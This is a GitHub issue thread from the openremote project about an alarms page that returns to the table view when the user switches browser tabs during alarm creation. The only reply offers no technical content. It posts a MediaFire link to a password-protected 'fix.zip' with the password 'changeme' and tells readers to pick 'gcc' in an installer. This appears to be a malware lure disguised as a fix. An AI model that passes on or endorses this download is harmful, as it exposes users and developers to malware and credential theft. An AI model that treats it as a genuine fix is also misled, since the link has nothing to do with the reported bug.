### ISSUE TITLE
Alarms: when switching tabs while creating an alarm the page goes back to the table view

### ISSUE THREAD

**Issue by DonWillems** [openremote/openremote#1389]
Reproduce:
1. Click add alarm to go to alarm creation page
2. Switch to a different tab in your browser and back
3. You are now back on the alarms overview page

Expected:
3. You are still on the alarm creation page.

A similar issue occurred somewhere else because the callhandler and callhooks were not done in _updateRoute. Maybe its the same here?

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
